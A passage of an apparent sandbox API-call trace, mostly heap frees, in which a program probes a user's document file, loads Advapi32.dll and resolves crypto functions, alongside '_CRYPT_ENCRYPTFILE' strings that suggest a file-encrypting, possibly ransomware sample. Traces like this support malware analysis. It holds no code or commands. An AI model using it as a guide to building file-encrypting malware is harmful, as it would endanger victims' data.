cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0079.847] CloseHandle (hObject=0x258) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0079.848] FreeLibrary (hLibModule=0x772d0000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0079.848] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0079.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0079.849] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0079.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0079.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0079.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0079.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0079.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0079.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0079.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0079.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0079.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0079.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0079.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0079.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0079.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.850] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\4lc7ZSflvh25kv.pps", lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20c19b40, ftCreationTime.dwHighDateTime=0x1d5edaa, ftLastAccessTime.dwLowDateTime=0x26ec44f0, ftLastAccessTime.dwHighDateTime=0x1d5ed07, ftLastWriteTime.dwLowDateTime=0x26ec44f0, ftLastWriteTime.dwHighDateTime=0x1d5ed07, nFileSizeHigh=0x0, nFileSizeLow=0x2237, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="4lc7ZSflvh25kv.pps", cAlternateFileName="4LC7ZS~1.PPS")) returned 0x41ac600 [0079.850] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0079.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0079.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0079.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0079.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0079.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0079.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0079.851] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.851] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0079.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0079.851] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0079.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0079.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0079.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0079.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0079.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0079.851] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0079.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0079.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0079.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.851] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0079.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0079.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.852] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0079.852] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0079.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0079.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0079.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.852] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0079.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0079.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0079.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0079.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0079.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0079.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0079.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0079.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0079.852] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0079.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0079.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0079.852] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0079.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.853] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d90 | out: hHeap=0x1780000) returned 1 [0079.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0079.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0079.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0079.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0079.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0079.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0079.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0079.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0079.853] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0079.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0079.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0079.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0079.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0079.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0079.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0079.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0079.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0079.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0079.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0079.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0079.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0079.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0079.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0079.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0079.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796f48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0079.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0079.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0079.854] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0079.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0079.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0079.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ee0 [0079.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0079.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0079.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0079.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15) returned 0x1796ea8 [0079.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0079.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0079.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0079.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0079.855] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0079.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0079.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0079.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ee0 | out: hHeap=0x1780000) returned 1 [0079.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0079.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0079.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0079.855] 